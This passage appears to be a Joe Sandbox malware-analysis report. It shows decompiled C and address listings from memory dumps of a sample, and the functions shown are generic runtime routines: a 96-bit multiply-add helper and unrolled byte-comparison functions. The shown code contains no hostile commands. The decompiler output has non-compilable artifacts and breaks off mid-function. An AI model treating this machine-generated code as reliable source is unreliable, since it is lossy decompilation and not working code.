Associated: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a8ca797307e157a635dd90dc2311daf1eb43a0da73e19da158aaf39a3e9c98
Instruction ID: 82d4d3c0ad3759fd46e0b62f97bee05f7d511c8c482cac141dddd79c6c729369
Opcode Fuzzy Hash: e6a8ca797307e157a635dd90dc2311daf1eb43a0da73e19da158aaf39a3e9c98
Instruction Fuzzy Hash: A6C25B6244F3D29FD7138B749C745E1BFB0AE2721471E05CBD8C18F1A3E2281A6AD766

Uniqueness

Uniqueness Score: -1.00%

Function 00414A6C Relevance: 1.4, Strings: 1, Instructions: 179
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 78%

			E00414A6C(char* _a4, intOrPtr _a8, unsigned int* _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				signed int _v24;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				unsigned int* _t77;
				unsigned int _t80;
				unsigned int _t83;
				unsigned int _t84;
				unsigned int _t85;
				signed int _t87;
				signed int _t90;
				signed int _t100;
				signed int _t107;
				unsigned int _t108;
				unsigned int _t110;
				unsigned int _t111;
				signed int _t116;
				unsigned int _t118;
				unsigned int _t120;
				signed int _t122;
				intOrPtr _t123;
				unsigned int _t133;
				unsigned int _t135;
				unsigned int _t138;
				unsigned int _t145;
				void* _t146;
				unsigned int _t150;
				unsigned int _t151;
				signed int _t152;

				_t75 =  *0x43d2bc; // 0xbb30e455
				_v8 = _t75 ^ _t152;
				_t77 = _a12;
				_t137 = 0;
				_v28 = 0x404e;
				 *_t77 = 0;
				_t77[1] = 0;
				_t77[2] = 0;
				if(_a8 <= 0) {
					L27:
					while(_t77[2] == _t137) {
						_t90 = _t77[1];
						_t77[2] = _t90 >> 0x10;
						_t116 =  *_t77;
						_t130 = _t116 >> 0x10;
						_t113 = _t116 << 0x10;
						_v28 = _v28 + 0xfff0;
						_t77[1] = _t90 << 0x00000010 | _t116 >> 0x00000010;
						 *_t77 = _t116 << 0x10;
					}
					if((_t77[2] & 0x00008000) != 0) {
						L30:
						_t77[2] = _v28;
						return E0040AF5A(_t77, 0x8000, _v8 ^ _t152, _t113, _t130, _t137);
					} else {
						goto L29;
					}
					do {
						L29:
						_t138 =  *_t77;
						_t130 = _t77[1];
						_v28 = _v28 + 0xffff;
						 *_t77 = _t138 + _t138;
						_t137 = _t130 + _t130 | _t138 >> 0x0000001f;
						_t113 = _t130 >> 0x1f;
						_t100 = _t77[2] + _t77[2] | _t130 >> 0x0000001f;
						_t77[1] = _t130 + _t130 | _t138 >> 0x0000001f;
						_t77[2] = _t100;
					} while ((0x00008000 & _t100) == 0);
					goto L30;
				} else {
					goto L1;
				}
				do {
					L1:
					_t118 =  *_t77;
					_t80 = _t77[1];
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 = _t118 + _t118;
					_t120 = _t80 + _t80 | _t118 >> 0x0000001f;
					_v24 = _t133;
					_v24 = _v24 & 0x00000000;
					_t107 = (_t77[2] + _t77[2] | _t80 >> 0x0000001f) + (_t77[2] + _t77[2] | _t80 >> 0x0000001f) | _t120 >> 0x0000001f;
					_t83 = _v20;
					_t145 = _t133 + _t133;
					_t122 = _t120 + _t120 | _t133 >> 0x0000001f;
					_t135 = _t145 + _t83;
					 *_t77 = _t145;
					_t77[1] = _t122;
					_t77[2] = _t107;
					if(_t135 < _t145 || _t135 < _t83) {
						_v24 = 1;
					}
					_t84 = 0;
					 *_t77 = _t135;
					if(_v24 != 0) {
						_t151 = _t122 + 1;
						if(_t151 < _t122 || _t151 < 1) {
							_t84 = 1;
						}
						_t77[1] = _t151;
						if(_t84 != 0) {
							_t77[2] = _t107 + 1;
						}
					}
					_t108 = _t77[1];
					_t123 = _v16;
					_t85 = _t108 + _t123;
					_t146 = 0;
					if(_t85 < _t108 || _t85 < _t123) {
						_t146 = 1;
					}
					_t77[1] = _t85;
					if(_t146 != 0) {
						_t77[2] = _t77[2] + 1;
					}
					_t77[2] = _t77[2] + _v12;
					_v24 = _v24 & 0x00000000;
					_t110 = _t135 + _t135;
					_t130 = _t85 + _t85 | _t135 >> 0x0000001f;
					_t87 = _t77[2] + _t77[2] | _t85 >> 0x0000001f;
					 *_t77 = _t110;
					_t77[1] = _t130;
					_t77[2] = _t87;
					_t113 =  *_a4;
					_t150 = _t110 + _t113;
					_v20 = _t113;
					if(_t150 < _t110 || _t150 < _t113) {
						_v24 = 1;
					}
					 *_t77 = _t150;
					if(_v24 != 0) {
						_t111 = _t130 + 1;
						if(_t111 < _t130 || _t111 < 1) {
							_t113 = 1;
						}
						_t77[1] = _t111;
						if(_t113 != 0) {
							_t77[2] = _t87 + 1;
						}
					}
					_a8 = _a8 - 1;
					_a4 = _a4 + 1;
				} while (_a8 > 0);
				_t137 = 0;
				goto L27;
			}

0x00414a74
0x00414a7b
0x00414a7e
0x00414a83
0x00414a86
0x00414a8d
0x00414a8f
0x00414a92
0x00414a98
0x00000000
0x00414be4
0x00414bbe
0x00414bc6
0x00414bc9
0x00414bd0
0x00414bd5
0x00414bd8
0x00414bdf
0x00414be2
0x00414be2
0x00414bf1
0x00414c23
0x00414c27
0x00414c39
0x00000000
0x00000000
0x00000000
0x00414bf3
0x00414bf3
0x00414bf3
0x00414bf5
0x00414bf8
0x00414c06
0x00414c0b
0x00414c12
0x00414c17
0x00414c19
0x00414c1c
0x00414c1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00414a9e
0x00414a9e
0x00414a9e
0x00414aa0
0x00414aa8
0x00414aa9
0x00414aaa
0x00414ab0
0x00414ab6
0x00414ac4
0x00414ac9
0x00414ad7
0x00414ad9
0x00414adc
0x00414ae0
0x00414ae2
0x00414ae5
0x00414ae7
0x00414aea
0x00414aef
0x00414af5
0x00414af5
0x00414afc
0x00414afe
0x00414b03
0x00414b05
0x00414b0a
0x00414b13
0x00414b13
0x00414b14
0x00414b19
0x00414b1c
0x00414b1c
0x00414b19
0x00414b1f
0x00414b22
0x00414b25
0x00414b28
0x00414b2c
0x00414b34
0x00414b34
0x00414b35
0x00414b3a
0x00414b3c
0x00414b3c
0x00414b42
0x00414b45
0x00414b49
0x00414b54
0x00414b64
0x00414b66
0x00414b68
0x00414b6b
0x00414b6e
0x00414b71
0x00414b74
0x00414b79
0x00414b7f
0x00414b7f
0x00414b8a
0x00414b8c
0x00414b8e
0x00414b95
0x00414b9e
0x00414b9e
0x00414b9f
0x00414ba4
0x00414ba7
0x00414ba7
0x00414ba4
0x00414baa
0x00414bad
0x00414bb0
0x00414bba
0x00000000

Strings

N@, xrefs: 00414A86

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 5fb7695aa0090885b1c5bd5d9f4e652b15798ba5559cd9c1eea3f148a0ca42d6
Instruction ID: ebc22adbb82347179d2c02d5caa73bc4a7094032cb0cbff19ef4abcb85c73d73
Opcode Fuzzy Hash: 5fb7695aa0090885b1c5bd5d9f4e652b15798ba5559cd9c1eea3f148a0ca42d6
Instruction Fuzzy Hash: 1E6171719052268FCB18CF49C5946AAF7B2FFC9300B1AC16ED9096B366D774AD41CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A55D Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040A55D(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x0040a55d
0x0040a55d
0x0040a563
0x0040a5e3
0x0040a5e5
0x0040a5e7
0x00000000
0x00000000
0x0040a5ed
0x0040a5f3
0x0040a672
0x0040a674
0x0040a676
0x00000000
0x00000000
0x0040a67c
0x0040a682
0x0040a701
0x0040a703
0x0040a705
0x00000000
0x00000000
0x0040a70b
0x0040a711
0x0040a790
0x0040a792
0x0040a794
0x00000000
0x00000000
0x0040a7a0
0x0040a820
0x0040a822
0x0040a824
0x00000000
0x00000000
0x0040a82a
0x0040a830
0x0040a8af
0x0040a8b1
0x0040a8b3
0x00000000
0x00000000
0x0040a8b9
0x0040a8bf
0x0040a93e
0x0040a940
0x0040a942
0x00000000
0x00000000
0x0040a950
0x0040a952
0x0040a535
0x0040a53d
0x0040a53f
0x0040a11b
0x0040a123
0x0040a125
0x0040a136
0x0040a136
0x00409d2b
0x0040aa87
0x0040aa87
0x0040a54c
0x0040a552
0x0040a96b
0x0040a96b
0x00000000
0x0040a558
0x00000000
0x0040a558
0x0040a552
0x0040a95f
0x0040a965
0x00000000
0x00000000
0x00000000
0x0040a965
0x0040a8c8
0x0040a8ca
0x0040a8e1
0x0040a8e9
0x0040a8eb
0x0040a902
0x0040a90a
0x0040a90c
0x0040a923
0x0040a92b
0x0040a92d
0x0040a93a
0x0040a93a
0x00000000
0x0040a92d
0x0040a919
0x0040a91d
0x00000000
0x00000000
0x00000000
0x0040a91d
0x0040a8f8
0x0040a8fc
0x00000000
0x00000000
0x00000000
0x0040a8fc
0x0040a8d7
0x0040a8db
0x00000000
0x00000000
0x00000000
0x0040a8db
0x0040a839
0x0040a83b
0x0040a852
0x0040a85a
0x0040a85c
0x0040a873
0x0040a87b
0x0040a87d
0x0040a894
0x0040a89c
0x0040a89e
0x0040a8ab
0x0040a8ab
0x00000000
0x0040a89e
0x0040a88a
0x0040a88e
0x00000000
0x00000000
0x00000000
0x0040a88e
0x0040a869
0x0040a86d
0x00000000
0x00000000
0x00000000
0x0040a86d
0x0040a848
0x0040a84c
0x00000000
0x00000000
0x00000000
0x0040a84c
0x0040a7aa
0x0040a7ac
0x0040a7c3
0x0040a7cb
0x0040a7cd
0x0040a7e4
0x0040a7ec
0x0040a7ee
0x0040a805
0x0040a80d
0x0040a80f
0x0040a81c
0x0040a81c
0x00000000
0x0040a80f
0x0040a7fb
0x0040a7ff
0x00000000
0x00000000
0x00000000
0x0040a7ff
0x0040a7da
0x0040a7de
0x00000000
0x00000000
0x00000000
0x0040a7de
0x0040a7b9
0x0040a7bd
0x00000000
0x00000000
0x00000000
0x0040a7bd
0x0040a71a
0x0040a71c
0x0040a733
0x0040a73b
0x0040a73d
0x0040a754
0x0040a75c
0x0040a75e
0x0040a775
0x0040a77d
0x0040a77f
0x0040a78c
0x0040a78c
0x00000000
0x0040a77f
0x0040a76b
0x0040a76f
0x00000000
0x00000000
0x00000000
0x0040a76f
0x0040a74a
0x0040a74e
0x00000000
0x00000000
0x00000000
0x0040a74e
0x0040a729
0x0040a72d
0x00000000
0x00000000
0x00000000
0x0040a72d
0x0040a68b
0x0040a68d
0x0040a6a4
0x0040a6ac
0x0040a6ae
0x0040a6c5
0x0040a6cd
0x0040a6cf
0x0040a6e6
0x0040a6ee
0x0040a6f0
0x0040a6fd
0x0040a6fd
0x00000000
0x0040a6f0
0x0040a6dc
0x0040a6e0
0x00000000
0x00000000
0x00000000
0x0040a6e0
0x0040a6bb
0x0040a6bf
0x00000000
0x00000000
0x00000000
0x0040a6bf
0x0040a69a
0x0040a69e
0x00000000
0x00000000
0x00000000
0x0040a69e
0x0040a5fc
0x0040a5fe
0x0040a615
0x0040a61d
0x0040a61f
0x0040a636
0x0040a63e
0x0040a640
0x0040a657
0x0040a65f
0x0040a661
0x0040a66e
0x0040a66e
0x00000000
0x0040a661
0x0040a64d
0x0040a651
0x00000000
0x00000000
0x00000000
0x0040a651
0x0040a62c
0x0040a630
0x00000000
0x00000000
0x00000000
0x0040a630
0x0040a60b
0x0040a60f
0x00000000
0x00000000
0x00000000
0x0040a565
0x0040a565
0x0040a569
0x0040a56d
0x0040a56f
0x0040a586
0x0040a586
0x0040a58a
0x0040a58e
0x0040a590
0x0040a5a7
0x0040a5a7
0x0040a5ab
0x0040a5af
0x0040a5b1
0x0040a5c8
0x0040a5c8
0x0040a5cc
0x0040a5d0
0x0040a5d2
0x0040a5d8
0x0040a5db
0x0040a5df
0x0040a5df
0x00000000
0x0040a5d2
0x0040a5b7
0x0040a5ba
0x0040a5be
0x0040a5c2
0x00000000
0x00000000
0x00000000
0x0040a5c2
0x0040a596
0x0040a599
0x0040a59d
0x0040a5a1
0x00000000
0x00000000
0x00000000
0x0040a5a1
0x0040a575
0x0040a578
0x0040a57c
0x0040a580
0x00000000
0x00000000
0x00000000
0x0040a580
0x00409956
0x00409956
0x00000000

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 356055ea41b588bb805f8ad7d3404253d0cc968bdf7d6876e84b82a98ac69f11
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: D9D160B3C0A6B30AC775812E456852BEE626FD164031EC7B68CE83F3CED13A9D1196D5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A13D Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040A13D(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
